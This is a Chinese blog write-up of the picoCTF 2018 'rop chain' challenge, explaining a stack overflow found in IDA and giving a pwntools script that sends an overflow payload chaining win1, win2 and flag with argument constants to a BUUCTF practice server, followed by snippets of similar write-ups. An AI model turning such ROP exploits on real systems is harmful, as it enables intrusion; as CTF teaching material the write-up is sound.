picoctf_2018_rop chain

最新推荐文章于 2024-12-22 16:26:44 发布
原创 最新推荐文章于 2024-12-22 16:26:44 发布 · 251 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何通过IDA工具定位溢出漏洞,并控制win1win2和flag参数,使用精心构造的payload在node3.buuoj.cn服务器上执行。涉及16进制补码、函数调用和远程代码执行。

先进行检查 32位
在这里插入图片描述打开ida查看一下 vuln 函数存在溢出可以利用
在这里插入图片描述又看到函数表有flag函数 win1 win2 和a1 存在条件 需要控制这3个参数变量
在这里插入图片描述
注意:0xBAAAAAAD是-1163220307对应的16进制的补码作为win_function2函数的参数
下面的 0xDEADBAAD是-559039827对应的16进制的补码作为flag函数的参数(我都已经在ida中转化)

之后又看到win1 win2
在这里插入图片描述在这里插入图片描述最后写下脚本

from pwn import*
from LibcSearcher import*

p=remote('node3.buuoj.cn',25328)
win1=0x80485CB
win2=0x80485D8
flag=0x804862B
payload='a'*(0x18+4)+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()
BUUCTF picoctf_2018_rop chain
2401_88087539的博客
01-22 446
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF pwn——picoctf_2018_rop chain
CNS-Enterprise BCC-1701-J
04-26 697
BUUCTF 做题练习
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1441
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
PicoCTF_2018_rop_chain
m0_74073577的博客
02-23 582
PicoCTF_2018_rop_chain
picoctf_2018_rop chain wp(python3)
Kata_Jhin的博客
06-02 433
picoctf_2018_rop chain wp(python3)
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3408
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
【BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 280
ret2text
picoctf_2018_rop_chain
z1r0的博客
12-09 361
picoctf_2018_rop_chain 查看保护 有溢出。 发现了一个flag函数,只需要满足win1不为0和win2不为0和a1=0xdeadbaad即可get flag。 又发现了两个函数,分析一下即可知道是设置win1和win2值的函数 rop的话先放win1这个函数,接着放win2这个函数,win2有参数,满足a1=0xbaaaaad就行。 最后win1和win2都不为0之后flag这个函数有一个a1参数,让a1参数过一下if就行。 构造rop的话注意一下32位的调用:调用函数地址-
buuctf30 picoctf_2018_rop chain 1
weixin_74861133的博客
11-23 201
只开启了NX保护。
PicoCTF_2018_rop_chain解题
2301_81504456的博客
07-25 415
上面的flag函数中也是只定义了一个参数a1为另一个值,在构造payload时就要注意分开,a1分别是两个函数的局部变量,要满足各自if的条件,win1中没有定义变量,就不用传递参数。3.保证win1,win2都大于0且a1=0xDEADBAAD的情况下打印出flag,win1函数直接赋值给win1的值是1,win2中传递了参数a1,在这个函数中传给0xBAAAAAAD,则保证了win2是1。fgets(arg1[存储读取数据的位置],arg2[读取的前多少位],arg3[被读取数据的位置])
BUUOJ PWN picoctf_2018_rop chain
weixin_50287973的博客
11-07 266
EXP1 from pwn import* from LibcSearcher import LibcSearcher #p=process("./PicoCTF_2018_rop_chain") p=remote("node3.buuoj.cn",25091) elf=ELF('./PicoCTF_2018_rop_chain') start=0x080484D0 payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put
buuctf -picoctf_2018_rop chain
fuiifiuiii的博客
09-16 292
很明显,已经将flag打开并输入到了s里,而想要输出就需要让win1==1、win2==1,以及a1=0xdeadbaad。显然a1是可以由我们自行传入的参数(即a1可控)如此来看,逻辑就很清晰了,从vuln栈溢出跳转到win1,返回到vuln,跳转到win2并携带参数a1,返回到vuln,跳转到flag函数并携带参数a1(这个与上一个不同)win2这里也有一些要求,即要求win1==1、a1=0xbaaaaaad,这样可以使得win2置1.看flag函数的逻辑顺序。简单明了,win1=1。
BUUCTF Pwn picoctf_2018_rop chain WP
最新发布
qq_33348179的博客
12-22 347
所以需要构造ROP将这两处的函数条件满足使win1和win2=1,再返回到vuln函数 获取flag。发现需要win1和win2都=1,而且a1等于特定值 交叉引用查看win1和win2的位置。看到vuln函数有栈溢出漏洞 同时发现旁边有flag的后门函数。32位 拖到IDA32 找到main函数。1.下载 checksec。
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1432
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值